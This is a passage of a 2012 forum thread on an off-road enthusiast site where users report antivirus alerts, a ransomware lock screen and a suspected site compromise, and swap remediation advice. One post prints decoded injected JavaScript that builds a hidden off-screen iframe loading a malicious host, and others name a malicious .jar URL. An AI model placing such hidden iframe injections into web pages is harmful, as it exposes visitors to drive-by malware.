Вредноносная прога - Страница 3 - Админ-центр ORM - OffRoadMaster.com - стиль жизни 4х4!

Перейти к содержимому


Фотография

Вредноносная прога


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 78

#41 ВНЕ САЙТА   Важняк

Важняк

    Дока

  • Модератор
  • PipPipPip
  • Регистрация: 28 Oct 2008
  • 8132 сообщений
  • Авто: Suzuki.
  • Имя:Костянтин
  • Пол:Мужчина
  • Город:Київ

Отправлено 25 October 2012 - 22:13

А у меня уже нормуль.

#42 ВНЕ САЙТА   Топор

Топор

    Гвардеец

  • Юзер
  • PipPip
  • Регистрация: 12 Dec 2005
  • 3507 сообщений
  • Авто: HD
  • Имя:Александр
  • Пол:Мужчина
  • Город:Киев

Отправлено 25 October 2012 - 23:50

И у меня нормуль уже. А то пару дней с рабочего касперский визжал и переспрашивал по заходу а из домашнего аваст вообще не пускал.

#43 ВНЕ САЙТА   Bay

Bay

    Гвардеец

  • ORM
  • PipPip
  • Регистрация: 05 May 2008
  • 1570 сообщений
  • Авто: нет
  • Имя:Сергей
  • Пол:Мужчина
  • Город:Киев

Отправлено 26 October 2012 - 10:00

Серега, соображаю:) продолжаем дальше думать что все пушисто:) :284:
Тем более за высказывание вольных мыслей о структуре сайта итд был словесно наказан, теперь нини:)

Саня! Реально, против тебя лично ничего не хотел сказать. Возможно попытка пошутить была неудачной. :161:

#44 ВНЕ САЙТА   Bay

Bay

    Гвардеец

  • ORM
  • PipPip
  • Регистрация: 05 May 2008
  • 1570 сообщений
  • Авто: нет
  • Имя:Сергей
  • Пол:Мужчина
  • Город:Киев

Отправлено 26 October 2012 - 10:15

А по теме, просто есть азы безопасности. Полезно почитать памятку о безопасном использовании интернет банкинга у любого банка:
- Для входа в систему не используйте подключение по баннерным ссылкам либо ссылкам, полученным по электронной почте.
- Не отвечайте на запросы (чаще всего рассылаются через электронную почту), содержащие требование предоставить или проверить логин и пароль.
- Рекомендуется удалять подозрительные электронные письма, не открывая их, особенно письма от неизвестных отправителей с прикрепленными файлами с расширениями *.exe, *.pif, *.vbs и другие файлы.
и т.д. и т.п.

#45 ВНЕ САЙТА   pseudo

pseudo

    Юнкер

  • Администратор
  • Pip
  • Регистрация: 06 Feb 2008
  • 227 сообщений
  • Авто: Daihatsu Feroza
  • Имя:Максим
  • Пол:Мужчина
  • Город:kiev.ua

Отправлено 26 October 2012 - 12:35

Всі ці ази ніяк не допомагають при атаках типу «DNS Spoofing», яка, на мою думку, мала місце в даному випадку. Трошки допомагають своєчасні оновлення програмного забезпечення Ваших машин (дозволяють позбутись проблем, коли підставний сайт зміює адресу в полі вводу та заголоку вікна на відповідні адреси реального сайту).
Коротше, софт має бути свіжим, антивірус—оновленим, файрвол просто має бути, бо наші провайдери часто виставляють комп’ютери клієнтів «голою ж в Інтернет».

#46 ВНЕ САЙТА   Alex_CONNECT

Alex_CONNECT

    Гвардеец

  • ORM
  • PipPip
  • Регистрация: 27 Sep 2005
  • 3869 сообщений
  • Авто: kyron
  • Имя:Александр
  • Пол:Мужчина
  • Город:Киев

Отправлено 26 October 2012 - 17:22

обнаружено: троянская программа HEUR:Exploit.Script.Blocker файл: http://ecwosrvyqrzka...94/jAA2ingo.jar

#47 ВНЕ САЙТА   hakim4x4

hakim4x4

    Гвардеец

  • Юзер
  • PipPip
  • Регистрация: 15 May 2008
  • 2025 сообщений
  • Авто: Nissan Patrol
  • Имя:Евгений
  • Пол:Мужчина
  • Город:г.Стаханов

Отправлено 28 October 2012 - 19:37

Вновь ругается:

#48 ВНЕ САЙТА   pasic

pasic

    Гость

  • Юзер
  • Регистрация: 06 Mar 2008
  • 44 сообщений
  • Авто: ford sierra
  • Имя:Саша
  • Город:Киев

Отправлено 28 October 2012 - 21:57

Вновь ругается:

У меня тоже опера что то ругнулась. Раньше не замечал.

Прикрепленные файлы

  • Прикрепленный файл  virus.JPG   74.13К   39 Количество загрузок:


#49 ВНЕ САЙТА   Дембель

Дембель

    Гвардеец

  • Юзер
  • PipPip
  • Регистрация: 25 Jan 2011
  • 1692 сообщений
  • Авто: Samurai+Tucson
  • Имя:Олег
  • Пол:Мужчина
  • Город:Киев

Отправлено 29 October 2012 - 09:56

Вот, сегодня утром при входе на сайт выскочила вот эта хрень:
Изображение
Можно как-то наказать шутников? Или проклятие наслать?
Или хотя бы код для разблокирования подскажите... :175:

#50 ВНЕ САЙТА   Зундер

Зундер

    Дока

  • Модератор
  • PipPipPip
  • Регистрация: 26 Jun 2007
  • 5769 сообщений
  • Авто: Тренер штурманов
  • Имя:Виталий
  • Пол:Мужчина
  • Город:На своей широте, на своей долготе

Отправлено 29 October 2012 - 10:30

Вот, сегодня утром при входе на сайт выскочила вот эта хрень:

Вот это наглость!!! :330: :330: :330:
http://yandex.ua/yan...окировка&lr=143

#51 ВНЕ САЙТА   yurchic

yurchic

    Гвардеец

  • ORM
  • PipPip
  • Регистрация: 29 May 2006
  • 2359 сообщений
  • Авто: Опель Монтерей
  • Имя:Юрий
  • Пол:Мужчина
  • Город:киев

Отправлено 29 October 2012 - 10:33

У меня тоже опера что то ругнулась. Раньше не замечал.

и у меня сегодня ругается

#52 ВНЕ САЙТА   rut

rut

    Дока

  • Юзер
  • PipPipPip
  • Регистрация: 31 Mar 2009
  • 5526 сообщений
  • Авто: Заяц (был), сейчас в поисках...
  • Имя:Алексей
  • Пол:Мужчина
  • Город:Киев

Отправлено 29 October 2012 - 12:38

О, я сегодня случайно словил интересную фигню, когда постил сообщение. Для интереса немного поковырялся и получилось вот что: двойной eval в js - на такую конструкцию почти любой антивирь заругается в "параноидальном" режиме. А тело скрипта еще и зашифровано ко всем радостям... я у себя проверил - вроде ничего вредного, просто добавляет ссылки на какой то левый сайт, вот расшифрованный код, который эвалится:

var newIframe=document.createElement('iframe');newIframe.src='http://ynefgawcfrol.cnisemi.com/do.php?fn=1&id=108&pageLoad=';newIframe.style.width='10px';newIframe.style.height='10px';newIframe.style.position='absolute';newIframe.style.top='-100px';newIframe.style.left='-100px';document.body.insertBefore(newIframe, document.body.firstChild);


Надеюсь эта инфа поможет админам в устранении проблемы.
  • Hakim это нравится

#53 ВНЕ САЙТА   Зундер

Зундер

    Дока

  • Модератор
  • PipPipPip
  • Регистрация: 26 Jun 2007
  • 5769 сообщений
  • Авто: Тренер штурманов
  • Имя:Виталий
  • Пол:Мужчина
  • Город:На своей широте, на своей долготе

Отправлено 29 October 2012 - 13:02

добавляет ссылки на какой то левый сайт, вот расшифрованный код, который эвалится:

http://whois.domaintools.com/cnisemi.com китайские хакеры. :269:

Я так понимаю, что наших читателей в Китае нет, так что заблокировать нахрен весь IP-диапазон на уровне хостера.
  • Predator и Shamba это нравится

#54 Гость_Кемская_*

Гость_Кемская_*
  • Гость
  • Регистрация: --

Отправлено 29 October 2012 - 13:05

был глюк, не могла зайти пару раз..писал не правильно настроен прокси-сервер..как сейчас не знаю..тк не выхожу из страницы ОРМа, открываю вкладку и без всяких паролей тут.

#55 ВНЕ САЙТА   Mihey

Mihey

    Юнкер

  • Юзер
  • Pip
  • Регистрация: 13 Jan 2011
  • 106 сообщений
  • Авто: Korando
  • Имя:Михаил
  • Пол:Мужчина
  • Город:Полтавская область

Отправлено 29 October 2012 - 15:00

Вот, сегодня утром при входе на сайт выскочила вот эта хрень:
Изображение
Можно как-то наказать шутников? Или проклятие наслать?
Или хотя бы код для разблокирования подскажите...


Эта же куйня и на меня напала :175:
В безопасном режиме убрал из автозагрузки файл ms
И удалил ms.exe по адресу указанному в автозагрузке.
  • Predator это нравится

#56 ВНЕ САЙТА   pseudo

pseudo

    Юнкер

  • Администратор
  • Pip
  • Регистрация: 06 Feb 2008
  • 227 сообщений
  • Авто: Daihatsu Feroza
  • Имя:Максим
  • Пол:Мужчина
  • Город:kiev.ua

Отправлено 29 October 2012 - 15:04

обнаружено: троянская программа HEUR:Exploit.Script.Blocker файл: http://ecwosrvyqrzka...94/jAA2ingo.jar

О, так вже краще.
Що ми маємо: лівий домен ecwosrvyqrzkahx.file-end-ocedodmngd.org, доречі, зараз вже неіснуючий, на якому лежить глибоко захована програма-вірус. Доречі, сам сайт file-end-ocedodmngd.org значиться в базах даних браузерів як нападницький.
Я практично повністю впевнений в тому, що маємо DNS-spoofing.

Як варіант, можу порадити використовувати DNS-сервери Google чи OpenDNS:
https://developers.g...eed/public-dns/
http://en.wikipedia.org/wiki/OpenDNS
можливість отруєння їх кешу досить низька, а їх адміністратори багато уваги приділяють безпеці.

#57 ВНЕ САЙТА   hakim4x4

hakim4x4

    Гвардеец

  • Юзер
  • PipPip
  • Регистрация: 15 May 2008
  • 2025 сообщений
  • Авто: Nissan Patrol
  • Имя:Евгений
  • Пол:Мужчина
  • Город:г.Стаханов

Отправлено 29 October 2012 - 15:26

Вот, сегодня утром при входе на сайт выскочила вот эта хрень:
Изображение

О, в полку извращенцев прибыло! :330:
http://www.offroadma...st__p__26279677

#58 ВНЕ САЙТА   Bay

Bay

    Гвардеец

  • ORM
  • PipPip
  • Регистрация: 05 May 2008
  • 1570 сообщений
  • Авто: нет
  • Имя:Сергей
  • Пол:Мужчина
  • Город:Киев

Отправлено 29 October 2012 - 18:02

О, так вже краще.
Що ми маємо: лівий домен ecwosrvyqrzkahx.file-end-ocedodmngd.org, доречі, зараз вже неіснуючий, на якому лежить глибоко захована програма-вірус. Доречі, сам сайт file-end-ocedodmngd.org значиться в базах даних браузерів як нападницький.
Я практично повністю впевнений в тому, що маємо DNS-spoofing.

Як варіант, можу порадити використовувати DNS-сервери Google чи OpenDNS:
https://developers.g...eed/public-dns/
http://en.wikipedia.org/wiki/OpenDNS
можливість отруєння їх кешу досить низька, а їх адміністратори багато уваги приділяють безпеці.


Кстати, скорее всего это решение проблемы.
У меня в настройках: предпочитаемый DNS-сервер 8.8.8.8. гугловский, а уже в альтернативных свой. Может поэтому никогда проблем не было?

#59 ВНЕ САЙТА   Важняк

Важняк

    Дока

  • Модератор
  • PipPipPip
  • Регистрация: 28 Oct 2008
  • 8132 сообщений
  • Авто: Suzuki.
  • Имя:Костянтин
  • Пол:Мужчина
  • Город:Київ

Отправлено 29 October 2012 - 21:51

У меня опять предупреждение выдало, причем файлы не хавает. Вот что пишет - "Последняя проверка (менее двух дней назад) показала, что на сайте размещён вредоносный код. Вредоносный код: обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО; содержит Mal/ExpJS-AN, Troj/ExpJS-FU (по данным компании Sophos)".
Все таки кто то наш сервер таки заразил. Я гляжу, у нас много недоброжелателей появилось...

Сообщение отредактировал Важняк: 29 October 2012 - 21:52


#60 ВНЕ САЙТА   hakim4x4

hakim4x4

    Гвардеец

  • Юзер
  • PipPip
  • Регистрация: 15 May 2008
  • 2025 сообщений
  • Авто: Nissan Patrol
  • Имя:Евгений
  • Пол:Мужчина
  • Город:г.Стаханов

Отправлено 30 October 2012 - 12:55

Сегодня, при клике на "Форумы", снова начало открываться что-то типа "Эбаут флеш плеер или фотошоп" и сразу после этого выплюнуло уже известную табличку по педофилии... Восстановил... Реально уже начинает утомлять... :303:
  • Pit Bull это нравится




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 скрытых пользователей


© 2004 - 2024 Offroadmaster ®
create & support by PAVLOFF & VOIN